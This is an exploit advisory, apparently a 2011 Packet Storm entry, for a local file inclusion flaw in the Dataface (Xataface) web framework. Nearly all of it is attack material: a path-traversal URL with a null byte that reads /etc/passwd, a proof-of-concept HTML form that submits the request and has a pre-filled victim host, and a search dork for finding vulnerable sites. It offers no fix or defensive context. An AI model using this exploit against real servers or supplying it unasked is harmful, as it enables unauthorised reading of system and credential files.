Dataface Local File Inclusion

🗓️ 07 Jun 2011 00:00:00Reported by ItSecTeamType

packetstorm🔗 packetstormsecurity.com👁 12 Views

Dataface Local File Inclusion vulnerability in xataface.co

`//==========================================================================  
//( #Topic : Dataface  
//( #Bug type : local file include  
//( #Advisory : http://xataface.com/  
//==========================================================================  
//( #Author : ItSecTeam  
//( #Email : [email protected]  
//( #Website: http://www.itsecteam.com  
//( #Forum : http://forum.ITSecTeam.com  
//( #dork : Powered by Dataface  
//( #Thanks : ahmadbady  
//---------------------------------------------------------------------  
  
Sample:  
http://server/index.php?-action=../../../../../../etc/passwd%00  
  
Poc:  
  
<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">  
<title>coded by ITSecTeam</title>  
  
<script language="JavaScript">  
  
function it(){  
xpl.action=  
xpl.victim.value+xpl.path.value+xpl.file.value+xpl.lfi.value;xpl.submit();  
  
}  
</script>  
  
</head>  
  
<body bgcolor="#FFFFFF">  
  
<p align="left"><font color="#0000FF">Dataface portal lfi vuln</font></p>  
<p align="left"><font  
color="#0000FF">-----------------------------------</font></p>  
<form method="post" name="xpl" onSubmit="it();">  
<p align="left">  
<font  
size="2" face="Tahoma">  
victim:  
<input type="text" name="victim" size="33";" style="color: #FFFFFF;  
background-color: #000000" value="http://apps.weblite.ca">  
path:  
<input type="text" name="path" size="20";" style="color: #FFFFFF;  
background-color: #000000" value="/">  
file:  
<input type="text" name="file" size="20";" style="color: #FFFFFF;  
background-color: #000000" value="index.php?-action=">  
</font>  
</p>  
<p align="left">  
<font  
size="2" face="Tahoma">  
lfi:  
<input type="text" name="lfi" size="115";" style="color: #FFFFFF;  
background-color: #000000" value="../../../../../../etc/passwd%00">  
</p>  
</p>  
<center>  
  
</p>  
<p><input type="submit" value="GO" name="B1" style="float: left"><input  
type="reset"  
value="reset" name="B2" style="float: left"></p>  
</form>  
<p><br>  
</p>  
</center>  
<font  
color="#0000FF">------------------------------------------</font></body></body>  
  
</html>  
  
`

07 Jun 2011 00:00Current

7.4High risk

Vulners AI Score7.4